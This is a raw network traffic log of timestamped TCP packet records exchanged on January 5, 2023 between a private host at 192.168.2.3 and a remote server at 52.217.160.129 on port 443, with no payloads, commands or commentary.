Jan 5, 2023 13:18:10.389586926 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.389684916 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.389724970 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.389748096 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.389756918 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.389796019 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.390021086 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.390045881 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.390094042 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.390109062 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.390136003 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.390152931 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.390162945 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.390177011 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.390197992 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.390198946 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.390233994 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.390261889 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.390276909 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.390348911 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.390392065 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.390418053 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.390427113 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.390458107 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.390482903 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.390718937 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.390743017 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.390795946 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.390799999 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.390825987 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.390856981 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.391035080 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.391064882 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.391107082 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.391125917 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.391153097 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.391328096 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.391371965 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.391405106 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.391415119 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.391422033 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.391464949 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.391868114 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.391892910 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.391936064 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.391957045 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.391972065 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.392005920 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.392220974 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.392247915 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.392297029 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.392312050 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.392345905 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.426606894 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.426709890 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.426875114 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.426920891 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.426943064 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.426971912 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.426979065 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.426994085 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.427052975 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.427066088 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.427320004 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.427345991 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.427386045 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.427401066 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.427445889 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.427615881 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.427644968 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.427686930 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.427695036 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.427706957 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.427740097 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.427784920 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.427951097 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.427973986 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.428020954 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.428035975 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.428076982 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.428106070 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.428113937 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.428287029 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.428320885 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.428349018 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.428363085 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.428396940 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.428574085 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.428617001 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.428642988 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.428656101 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.428680897 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.428725958 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.430790901 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.525377035 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.525437117 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.525486946 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.525619030 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.525659084 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.525684118 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.525722027 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.525727034 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.525742054 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.525767088 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.525851965 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.525865078 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.525923014 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.525974035 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.525995016 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.526139975 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.526139975 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.526154995 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.526221037 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.526437044 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.526731968 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.526753902 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.526797056 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.526808023 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.526864052 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.527623892 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.527662039 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.527705908 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.527714968 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.527743101 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.528161049 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.528191090 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.528223038 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.528230906 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.528255939 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.528956890 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.529004097 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.529033899 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.529043913 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.529050112 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.529076099 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.529103041 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.529330969 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.529355049 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.529388905 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.529397011 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.529417992 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.529436111 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.529439926 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.529630899 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.529656887 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.529692888 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.529700994 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.529720068 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.530416965 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.530457973 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.530488014 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.530494928 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.530500889 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.530524015 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.530559063 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.530766010 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.530791044 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.530822039 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.530829906 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.530872107 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.530890942 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.530895948 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.531050920 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.531080008 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.531111956 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.531120062 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.531167030 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.531174898 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.531208038 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.531369925 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.531390905 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.531421900 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.531430960 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.531456947 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.531480074 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.531486034 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.531716108 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.531743050 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.531774998 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.531785965 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.531812906 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.532083988 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.532107115 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.532131910 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.532140970 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.532166958 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.532372952 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.532409906 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.532433987 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.532447100 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.532469034 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.532685995 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.532725096 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.532742023 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.532756090 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.532774925 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.532794952 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.533044100 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.533065081 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.533102989 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.533119917 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.533130884 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.533147097 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.534461021 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.534496069 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.534542084 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.534552097 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.534580946 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.534840107 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.534861088 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.534893036 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.534900904 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.534919024 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.535351038 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.535384893 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.535408020 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.535419941 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.535439968 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.535479069 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.535509109 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.535665035 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.535685062 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.535718918 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.535722017 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.535731077 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.535763979 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.535968065 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.535993099 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.536031961 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.536041021 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.536062002 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.536264896 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.536304951 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.536334991 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.536344051 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.536385059 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.536566019 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.536588907 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.536632061 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.536640882 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.536664963 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.536698103 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.536703110 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.536973000 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.537003040 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.537040949 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.537050009 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.537085056 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.537285089 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.537327051 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.537348986 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.537358046 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.537403107 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.537565947 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.537586927 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.537623882 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.537626028 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.537636995 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.537653923 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.537677050 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.537878990 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.537899017 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.537944078 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.537951946 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.537975073 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.538182974 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.538232088 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.538255930 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.538268089 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.538301945 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.538322926 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.538471937 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.538494110 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.538531065 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.538533926 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.538543940 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.538558960 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.538588047 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.538793087 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.538815975 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.538866997 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.538870096 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.538882971 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.538903952 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.538924932 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.539068937 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.539093018 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.539125919 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.539135933 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.539159060 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.539177895 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.539182901 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.539396048 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.539422035 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.539448977 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.539457083 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.539486885 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.539666891 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.539706945 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.539726019 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.539733887 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.539763927 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.539793968 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.539917946 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.539942980 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.539969921 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.539978981 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.539999008 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.540016890 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.540021896 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.540177107 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.540210962 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.540235996 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.540244102 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.540272951 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.540412903 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.540452957 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.540472031 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.540479898 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.540504932 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.540535927 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.540937901 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.540967941 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.541002035 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.541013002 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.541027069 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.541050911 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.541057110 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.541263103 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.541290045 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.541320086 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.541327953 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.541363001 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.541537046 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.541577101 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.541593075 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.541601896 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.541630983 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.541662931 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.541795015 CET	443	49691	52.217.160.129	192.168.2.3
